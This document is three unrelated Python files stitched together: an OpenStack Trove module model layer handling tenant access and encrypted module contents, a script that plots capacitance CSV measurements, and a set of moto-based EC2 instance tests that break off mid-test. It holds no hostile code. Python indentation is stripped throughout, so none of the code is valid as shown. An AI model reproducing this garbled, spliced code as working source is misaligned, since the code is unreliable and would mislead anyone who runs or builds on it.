# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Model classes that form the core of Module functionality."""
from datetime import datetime
import hashlib
from sqlalchemy.sql.expression import or_
from trove.common import cfg
from trove.common import crypto_utils
from trove.common import exception
from trove.common.i18n import _
from trove.common import utils
from trove.datastore import models as datastore_models
from trove.db import models
from oslo_log import log as logging
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class Modules(object):
DEFAULT_LIMIT = CONF.modules_page_size
ENCRYPT_KEY = CONF.module_aes_cbc_key
VALID_MODULE_TYPES = [mt.lower() for mt in CONF.module_types]
MATCH_ALL_NAME = 'all'
@staticmethod
def load(context, datastore=None):
if context is None:
raise TypeError("Argument context not defined.")
query_opts = {'deleted': False}
if datastore:
if datastore.lower() == Modules.MATCH_ALL_NAME:
datastore = None
query_opts['datastore_id'] = datastore
if context.is_admin:
db_info = DBModule.find_all(**query_opts)
if db_info.count() == 0:
LOG.debug("No modules found for admin user")
else:
# build a query manually, since we need current tenant
# plus the 'all' tenant ones
query_opts['visible'] = True
db_info = DBModule.query().filter_by(**query_opts)
db_info = db_info.filter(or_(DBModule.tenant_id == context.tenant,
DBModule.tenant_id.is_(None)))
if db_info.count() == 0:
LOG.debug("No modules found for tenant %s" % context.tenant)
modules = db_info.all()
return modules
@staticmethod
def load_auto_apply(context, datastore_id, datastore_version_id):
"""Return all the auto-apply modules for the given criteria."""
if context is None:
raise TypeError("Argument context not defined.")
query_opts = {'deleted': False,
'auto_apply': True}
db_info = DBModule.query().filter_by(**query_opts)
db_info = Modules.add_tenant_filter(db_info, context.tenant)
db_info = Modules.add_datastore_filter(db_info, datastore_id)
db_info = Modules.add_ds_version_filter(db_info, datastore_version_id)
if db_info.count() == 0:
LOG.debug("No auto-apply modules found for tenant %s" %
context.tenant)
modules = db_info.all()
return modules
@staticmethod
def add_tenant_filter(query, tenant_id):
return query.filter(or_(DBModule.tenant_id == tenant_id,
DBModule.tenant_id.is_(None)))
@staticmethod
def add_datastore_filter(query, datastore_id):
return query.filter(or_(DBModule.datastore_id == datastore_id,
DBModule.datastore_id.is_(None)))
@staticmethod
def add_ds_version_filter(query, datastore_version_id):
return query.filter(or_(
DBModule.datastore_version_id == datastore_version_id,
DBModule.datastore_version_id.is_(None)))
@staticmethod
def load_by_ids(context, module_ids):
"""Return all the modules for the given ids. Screens out the ones
for other tenants, unless the user is admin.
"""
if context is None:
raise TypeError("Argument context not defined.")
modules = []
if module_ids:
query_opts = {'deleted': False}
db_info = DBModule.query().filter_by(**query_opts)
if not context.is_admin:
db_info = Modules.add_tenant_filter(db_info, context.tenant)
db_info = db_info.filter(DBModule.id.in_(module_ids))
modules = db_info.all()
return modules
class Module(object):
def __init__(self, context, module_id):
self.context = context
self.module_id = module_id
@staticmethod
def create(context, name, module_type, contents,
description, tenant_id, datastore,
datastore_version, auto_apply, visible, live_update):
if module_type.lower() not in Modules.VALID_MODULE_TYPES:
LOG.error("Valid module types: %s" % Modules.VALID_MODULE_TYPES)
raise exception.ModuleTypeNotFound(module_type=module_type)
Module.validate_action(
context, 'create', tenant_id, auto_apply, visible)
datastore_id, datastore_version_id = Module.validate_datastore(
datastore, datastore_version)
if Module.key_exists(
name, module_type, tenant_id,
datastore_id, datastore_version_id):
datastore_str = datastore_id or Modules.MATCH_ALL_NAME
ds_version_str = datastore_version_id or Modules.MATCH_ALL_NAME
raise exception.ModuleAlreadyExists(
name=name, datastore=datastore_str, ds_version=ds_version_str)
md5, processed_contents = Module.process_contents(contents)
module = DBModule.create(
name=name,
type=module_type.lower(),
contents=processed_contents,
description=description,
tenant_id=tenant_id,
datastore_id=datastore_id,
datastore_version_id=datastore_version_id,
auto_apply=auto_apply,
visible=visible,
live_update=live_update,
md5=md5)
return module
# Certain fields require admin access to create/change/delete
@staticmethod
def validate_action(context, action_str, tenant_id, auto_apply, visible):
error_str = None
if not context.is_admin:
option_strs = []
if tenant_id is None:
option_strs.append(_("Tenant: %s") % Modules.MATCH_ALL_NAME)
if auto_apply:
option_strs.append(_("Auto: %s") % auto_apply)
if not visible:
option_strs.append(_("Visible: %s") % visible)
if option_strs:
error_str = "(" + " ".join(option_strs) + ")"
if error_str:
raise exception.ModuleAccessForbidden(
action=action_str, options=error_str)
@staticmethod
def validate_datastore(datastore, datastore_version):
datastore_id = None
datastore_version_id = None
if datastore:
ds, ds_ver = datastore_models.get_datastore_version(
type=datastore, version=datastore_version)
datastore_id = ds.id
if datastore_version:
datastore_version_id = ds_ver.id
elif datastore_version:
msg = _("Cannot specify version without datastore")
raise exception.BadRequest(message=msg)
return datastore_id, datastore_version_id
@staticmethod
def key_exists(name, module_type, tenant_id, datastore_id,
datastore_version_id):
try:
DBModule.find_by(
name=name, type=module_type, tenant_id=tenant_id,
datastore_id=datastore_id,
datastore_version_id=datastore_version_id,
deleted=False)
return True
except exception.ModelNotFoundError:
return False
# We encrypt the contents (which should be encoded already, since it
# might be in binary format) and then encode them again so they can
# be stored in a text field in the Trove database.
@staticmethod
def process_contents(contents):
md5 = hashlib.md5(contents).hexdigest()
encrypted_contents = crypto_utils.encrypt_data(
contents, Modules.ENCRYPT_KEY)
return md5, crypto_utils.encode_data(encrypted_contents)
# Do the reverse to 'deprocess' the contents
@staticmethod
def deprocess_contents(processed_contents):
encrypted_contents = crypto_utils.decode_data(processed_contents)
return crypto_utils.decrypt_data(
encrypted_contents, Modules.ENCRYPT_KEY)
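    # A round-trip sketch (assuming Modules.ENCRYPT_KEY is configured):
    #   md5, stored = Module.process_contents(contents)
    #   assert Module.deprocess_contents(stored) == contents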
@staticmethod
def delete(context, module):
Module.validate_action(
context, 'delete',
module.tenant_id, module.auto_apply, module.visible)
Module.enforce_live_update(module.id, module.live_update, module.md5)
module.deleted = True
module.deleted_at = datetime.utcnow()
module.save()
@staticmethod
def enforce_live_update(module_id, live_update, md5):
if not live_update:
instances = DBInstanceModule.find_all(
module_id=module_id, md5=md5, deleted=False).all()
if instances:
raise exception.ModuleAppliedToInstance()
@staticmethod
def load(context, module_id):
module = None
try:
if context.is_admin:
module = DBModule.find_by(id=module_id, deleted=False)
else:
module = DBModule.find_by(
id=module_id, tenant_id=context.tenant, visible=True,
deleted=False)
except exception.ModelNotFoundError:
# See if we have the module in the 'all' tenant section
if not context.is_admin:
try:
module = DBModule.find_by(
id=module_id, tenant_id=None, visible=True,
deleted=False)
except exception.ModelNotFoundError:
pass # fall through to the raise below
if not module:
msg = _("Module with ID %s could not be found.") % module_id
raise exception.ModelNotFoundError(msg)
# Save the encrypted contents in case we need to put it back
# when updating the record
module.encrypted_contents = module.contents
module.contents = Module.deprocess_contents(module.contents)
return module
@staticmethod
def update(context, module, original_module):
Module.enforce_live_update(
original_module.id, original_module.live_update,
original_module.md5)
# we don't allow any changes to 'admin'-type modules, even if
# the values changed aren't the admin ones.
access_tenant_id = (None if (original_module.tenant_id is None or
module.tenant_id is None)
else module.tenant_id)
access_auto_apply = original_module.auto_apply or module.auto_apply
access_visible = original_module.visible and module.visible
Module.validate_action(
context, 'update',
access_tenant_id, access_auto_apply, access_visible)
ds_id, ds_ver_id = Module.validate_datastore(
module.datastore_id, module.datastore_version_id)
if module.contents != original_module.contents:
md5, processed_contents = Module.process_contents(module.contents)
module.md5 = md5
module.contents = processed_contents
else:
# on load the contents were decrypted, so
# we need to put the encrypted contents back before we update
module.contents = original_module.encrypted_contents
if module.datastore_id:
module.datastore_id = ds_id
if module.datastore_version_id:
module.datastore_version_id = ds_ver_id
module.updated = datetime.utcnow()
DBModule.save(module)
class InstanceModules(object):
@staticmethod
def load(context, instance_id=None, module_id=None, md5=None):
selection = {'deleted': False}
if instance_id:
selection['instance_id'] = instance_id
if module_id:
selection['module_id'] = module_id
if md5:
selection['md5'] = md5
db_info = DBInstanceModule.find_all(**selection)
if db_info.count() == 0:
LOG.debug("No instance module records found")
limit = utils.pagination_limit(
context.limit, Modules.DEFAULT_LIMIT)
data_view = DBInstanceModule.find_by_pagination(
'modules', db_info, 'foo', limit=limit, marker=context.marker)
next_marker = data_view.next_page_marker
return data_view.collection, next_marker
class InstanceModule(object):
def __init__(self, context, instance_id, module_id):
self.context = context
self.instance_id = instance_id
self.module_id = module_id
@staticmethod
def create(context, instance_id, module_id, md5):
instance_module = DBInstanceModule.create(
instance_id=instance_id,
module_id=module_id,
md5=md5)
return instance_module
@staticmethod
def delete(context, instance_module):
instance_module.deleted = True
instance_module.deleted_at = datetime.utcnow()
instance_module.save()
@staticmethod
def load(context, instance_id, module_id, deleted=False):
instance_module = None
try:
instance_module = DBInstanceModule.find_by(
instance_id=instance_id, module_id=module_id, deleted=deleted)
except exception.ModelNotFoundError:
pass
return instance_module
@staticmethod
def update(context, instance_module):
instance_module.updated = datetime.utcnow()
DBInstanceModule.save(instance_module)
class DBInstanceModule(models.DatabaseModelBase):
_data_fields = [
'id', 'instance_id', 'module_id', 'md5', 'created',
'updated', 'deleted', 'deleted_at']
class DBModule(models.DatabaseModelBase):
_data_fields = [
'id', 'name', 'type', 'contents', 'description',
'tenant_id', 'datastore_id', 'datastore_version_id',
'auto_apply', 'visible', 'live_update',
'md5', 'created', 'updated', 'deleted', 'deleted_at']
def persisted_models():
return {'modules': DBModule, 'instance_modules': DBInstanceModule}
|
import csv
import datetime
import matplotlib.pyplot as plt
import matplotlib
import itertools
import numpy
import argparse
import sys
YMIN = 0
YMAX = 35000
"""
colors = ['b', 'g', 'r',
'c', 'm', 'y',
'k'
]
"""
def read_datafile(file_name, norm_time):
time = []
capacitance = []
with open(file_name, 'rb') as f:
reader = csv.reader(f)
for row in reader:
time.append(matplotlib.dates.datestr2num(row[0]))
capacitance.append(row[1:])
if norm_time:
return (range(0, len(time)), capacitance)
else:
return (time, capacitance)
def plot_data(file_name, norm_time=True, skip_list=None):
data_far = read_datafile(file_name, norm_time)
it = itertools.izip(*data_far[1]) # get iterator to capacitance data
channel = 0
    plotting_function = None
if norm_time:
plotting_function = plt.plot
else:
plt.gca().xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S.%f"))
plotting_function = plt.plot_date
color_list = []
    name = ["1+2", "1-3", "1-4", "2+3", "2-4", "3+4", "LED"]
colors = ['b', 'g', 'r',
'c', 'm', 'y',
'k', '0.75']
for i in it:
        if skip_list is None or channel not in skip_list:
            # select a random color that is different enough (distance > 0.5, an
            # arbitrary threshold) from the colors used so far
            # (note: the plot call below uses the fixed palette in `colors`)
            while True:
                color = numpy.random.rand(3, 1)
                for col in color_list:
                    if numpy.linalg.norm(col - color) < 0.5:
                        break  # too close to an existing color; draw again
                else:
                    break  # sufficiently different from all previous colors
color_list.append(color)
plotting_function(data_far[0], i, color=colors[channel], linestyle="-", marker=".",
label=" "+ name[channel])
channel += 1
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Tool that can read CSV files generated by VSP experiments.')
parser.add_argument('files', nargs='+', help='Input file(s)')
parser.add_argument('-t', '--time', default=False, action='store_true', help='Plot time instead of measurement number')
parser.add_argument('-s', '--skip', nargs='+', default=None, type=int, help='Don\'t plot these channels')
parser.add_argument('-l', '--limit', default=False, action='store_true', help='Limit y scale from %i to %i' % (YMIN, YMAX))
parser.add_argument('--title', default="", help='Title for the plot')
args = parser.parse_args()
    if args.files is None:
parser.print_help()
sys.exit()
for f in args.files:
plot_data(f, not args.time, args.skip)
plt.ylim([30000, YMAX])
plt.draw()
plt.ylabel('CDC output')
if not args.time:
plt.xlim([0, 250])
if args.limit:
plt.ylim([YMIN, YMAX])
plt.axhline(32768)
plt.legend( loc='upper right' )
plt.grid(which='both')
plt.title(args.title)
plt.show()
|
from __future__ import unicode_literals
from botocore.exceptions import ClientError
import pytest
from unittest import SkipTest
import base64
import ipaddress
import six
import boto
import boto3
from boto.ec2.instance import Reservation, InstanceAttribute
from boto.exception import EC2ResponseError
from freezegun import freeze_time
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2, settings
from tests import EXAMPLE_AMI_ID
from tests.helpers import requires_boto_gte
if six.PY2:
decode_method = base64.decodestring
else:
decode_method = base64.decodebytes
################ Test Readme ###############
def add_servers(ami_id, count):
conn = boto.connect_ec2()
for index in range(count):
conn.run_instances(ami_id)
@mock_ec2_deprecated
def test_add_servers():
add_servers(EXAMPLE_AMI_ID, 2)
conn = boto.connect_ec2()
reservations = conn.get_all_reservations()
assert len(reservations) == 2
instance1 = reservations[0].instances[0]
assert instance1.image_id == EXAMPLE_AMI_ID
############################################
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_launch_and_terminate():
conn = boto.ec2.connect_to_region("us-east-1")
with pytest.raises(EC2ResponseError) as ex:
reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set"
)
reservation = conn.run_instances(EXAMPLE_AMI_ID)
reservation.should.be.a(Reservation)
reservation.instances.should.have.length_of(1)
instance = reservation.instances[0]
instance.state.should.equal("pending")
reservations = conn.get_all_reservations()
reservations.should.have.length_of(1)
reservations[0].id.should.equal(reservation.id)
instances = reservations[0].instances
instances.should.have.length_of(1)
instance = instances[0]
    instance.id.should.equal(reservation.instances[0].id)
instance.state.should.equal("running")
instance.launch_time.should.equal("2014-01-01T05:00:00.000Z")
instance.vpc_id.shouldnt.equal(None)
instance.placement.should.equal("us-east-1a")
root_device_name = instance.root_device_name
instance.block_device_mapping[root_device_name].status.should.equal("in-use")
volume_id = instance.block_device_mapping[root_device_name].volume_id
volume_id.should.match(r"vol-\w+")
volume = conn.get_all_volumes(volume_ids=[volume_id])[0]
volume.attach_data.instance_id.should.equal(instance.id)
volume.status.should.equal("in-use")
with pytest.raises(EC2ResponseError) as ex:
conn.terminate_instances([instance.id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set"
)
conn.terminate_instances([instance.id])
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.state.should.equal("terminated")
@mock_ec2
def test_instance_terminate_discard_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": True},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert not list(ec2_resource.volumes.all())
@mock_ec2
def test_instance_terminate_keep_volumes_explicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": False},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 1
@mock_ec2
def test_instance_terminate_keep_volumes_implicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}}],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
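    # DeleteOnTermination was left unspecified, so the volume is kept and
    # becomes available after termination.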
assert len(instance_volume_ids) == 1
volume = ec2_resource.Volume(instance_volume_ids[0])
volume.state.should.equal("available")
@mock_ec2
def test_instance_terminate_detach_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}},
],
)
instance = result[0]
for volume in instance.volumes.all():
response = instance.detach_volume(VolumeId=volume.volume_id)
response["State"].should.equal("detaching")
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 2
@mock_ec2
def test_instance_detach_volume_wrong_path():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},],
)
instance = result[0]
for volume in instance.volumes.all():
with pytest.raises(ClientError) as ex:
instance.detach_volume(VolumeId=volume.volume_id, Device="/dev/sdf")
ex.value.response["Error"]["Code"].should.equal("InvalidAttachment.NotFound")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The volume {0} is not attached to instance {1} as device {2}".format(
volume.volume_id, instance.instance_id, "/dev/sdf"
)
)
@mock_ec2_deprecated
def test_terminate_empty_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_attach_volume():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
vol1 = conn.create_volume(size=36, zone=conn.region.name)
vol1.attach(instance.id, "/dev/sda1")
vol1.update()
vol2 = conn.create_volume(size=65, zone=conn.region.name)
vol2.attach(instance.id, "/dev/sdb1")
vol2.update()
vol3 = conn.create_volume(size=130, zone=conn.region.name)
vol3.attach(instance.id, "/dev/sdc1")
vol3.update()
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.block_device_mapping.should.have.length_of(3)
for v in conn.get_all_volumes(
volume_ids=[instance.block_device_mapping["/dev/sdc1"].volume_id]
):
v.attach_data.instance_id.should.equal(instance.id)
        # attach_time and create_time are comparable to launch_time because
        # freeze_time pins the clock for the whole test.
        v.attach_data.attach_time.should.equal(instance.launch_time)
        v.create_time.should.equal(instance.launch_time)
v.region.name.should.equal(instance.region.name)
v.status.should.equal("in-use")
@mock_ec2_deprecated
def test_get_instances_by_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
reservations = conn.get_all_reservations(instance_ids=[instance1.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(1)
reservation.instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(2)
instance_ids = [instance.id for instance in reservation.instances]
instance_ids.should.equal([instance1.id, instance2.id])
    # Calling get_all_reservations with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_reservations(instance_ids=[instance1.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_get_paginated_instances():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
for i in range(100):
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
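    # First page: request 50 of the 100 reservations; the response includes a
    # NextToken because more results remain.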
resp = client.describe_instances(MaxResults=50)
reservations = resp["Reservations"]
reservations.should.have.length_of(50)
next_token = resp["NextToken"]
next_token.should_not.be.none
resp2 = client.describe_instances(NextToken=next_token)
reservations.extend(resp2["Reservations"])
reservations.should.have.length_of(100)
assert "NextToken" not in resp2.keys()
@mock_ec2
def test_create_with_tags():
ec2 = boto3.client("ec2", region_name="us-west-2")
instances = ec2.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
InstanceType="t2.micro",
TagSpecifications=[
{
"ResourceType": "instance",
"Tags": [
{"Key": "MY_TAG1", "Value": "MY_VALUE1"},
{"Key": "MY_TAG2", "Value": "MY_VALUE2"},
],
},
{
"ResourceType": "instance",
"Tags": [{"Key": "MY_TAG3", "Value": "MY_VALUE3"}],
},
],
)
assert "Tags" in instances["Instances"][0]
len(instances["Instances"][0]["Tags"]).should.equal(3)
@mock_ec2_deprecated
def test_get_instances_filtering_by_state():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
conn.terminate_instances([instance1.id])
reservations = conn.get_all_reservations(filters={"instance-state-name": "running"})
reservations.should.have.length_of(1)
# Since we terminated instance1, only instance2 and instance3 should be
# returned
instance_ids = [instance.id for instance in reservations[0].instances]
set(instance_ids).should.equal(set([instance2.id, instance3.id]))
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "running"}
)
reservations.should.have.length_of(1)
instance_ids = [instance.id for instance in reservations[0].instances]
instance_ids.should.equal([instance2.id])
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "terminated"}
)
list(reservations).should.equal([])
# get_all_reservations should still return all 3
reservations = conn.get_all_reservations()
reservations[0].instances.should.have.length_of(3)
conn.get_all_reservations.when.called_with(
filters={"not-implemented-filter": "foobar"}
).should.throw(NotImplementedError)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
reservations = conn.get_all_reservations(filters={"instance-id": instance1.id})
# get_all_reservations should return just instance1
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"instance-id": [instance1.id, instance2.id]}
)
    # get_all_reservations should return two instances
reservations[0].instances.should.have.length_of(2)
reservations = conn.get_all_reservations(filters={"instance-id": "non-existing-id"})
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_type():
conn = boto.connect_ec2()
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance1 = reservation1.instances[0]
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance2 = reservation2.instances[0]
reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance3 = reservation3.instances[0]
reservations = conn.get_all_reservations(filters={"instance-type": "m1.small"})
    # get_all_reservations should return instance1 and instance2
reservations.should.have.length_of(2)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]
set(instance_ids).should.equal(set([instance1.id, instance2.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "t1.micro"})
# get_all_reservations should return one
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(
filters={"instance-type": ["t1.micro", "m1.small"]}
)
reservations.should.have.length_of(3)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
reservations[2].instances.should.have.length_of(1)
instance_ids = [
reservations[0].instances[0].id,
reservations[1].instances[0].id,
reservations[2].instances[0].id,
]
set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "bogus"})
# bogus instance-type should return none
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_reason_code():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
reservations = conn.get_all_reservations(
filters={"state-reason-code": "Client.UserInitiatedShutdown"}
)
# get_all_reservations should return instance1 and instance2
reservations[0].instances.should.have.length_of(2)
set([instance1.id, instance2.id]).should.equal(
set([i.id for i in reservations[0].instances])
)
reservations = conn.get_all_reservations(filters={"state-reason-code": ""})
    # get_all_reservations should return instance3
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_source_dest_check():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
conn.modify_instance_attribute(
instance1.id, attribute="sourceDestCheck", value=False
)
source_dest_check_false = conn.get_all_reservations(
filters={"source-dest-check": "false"}
)
source_dest_check_true = conn.get_all_reservations(
filters={"source-dest-check": "true"}
)
source_dest_check_false[0].instances.should.have.length_of(1)
source_dest_check_false[0].instances[0].id.should.equal(instance1.id)
source_dest_check_true[0].instances.should.have.length_of(1)
source_dest_check_true[0].instances[0].id.should.equal(instance2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_vpc_id():
conn = boto.connect_vpc("the_key", "the_secret")
vpc1 = conn.create_vpc("10.0.0.0/16")
subnet1 = conn.create_subnet(vpc1.id, "10.0.0.0/27")
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)
instance1 = reservation1.instances[0]
vpc2 = conn.create_vpc("10.1.0.0/16")
subnet2 = conn.create_subnet(vpc2.id, "10.1.0.0/27")
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)
instance2 = reservation2.instances[0]
reservations1 = conn.get_all_reservations(filters={"vpc-id": vpc1.id})
reservations1.should.have.length_of(1)
reservations1[0].instances.should.have.length_of(1)
reservations1[0].instances[0].id.should.equal(instance1.id)
reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)
reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)
reservations2 = conn.get_all_reservations(filters={"vpc-id": vpc2.id})
reservations2.should.have.length_of(1)
reservations2[0].instances.should.have.length_of(1)
reservations2[0].instances[0].id.should.equal(instance2.id)
reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)
reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_architecture():
conn = boto.connect_ec2()
    conn.run_instances(EXAMPLE_AMI_ID, min_count=1)
reservations = conn.get_all_reservations(filters={"architecture": "x86_64"})
# get_all_reservations should return the instance
reservations[0].instances.should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_image_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "image-id", "Values": [EXAMPLE_AMI_ID]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_account_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "owner-id", "Values": ["123456789012"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_private_dns():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"
)
reservations = client.describe_instances(
Filters=[{"Name": "private-dns-name", "Values": ["ip-10-0-0-1.ec2.internal"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_ni_private_dns():
client = boto3.client("ec2", region_name="us-west-2")
conn = boto3.resource("ec2", "us-west-2")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"
)
reservations = client.describe_instances(
Filters=[
{
"Name": "network-interface.private-dns-name",
"Values": ["ip-10-0-0-1.us-west-2.compute.internal"],
}
]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_name():
client = boto3.client("ec2", region_name="us-east-1")
client.create_security_group(Description="test", GroupName="test_sg")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-name", "Values": ["test_sg"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_id():
client = boto3.client("ec2", region_name="us-east-1")
create_sg = client.create_security_group(Description="test", GroupName="test_sg")
group_id = create_sg["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-id", "Values": [group_id]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_subnet_id():
client = boto3.client("ec2", region_name="us-east-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
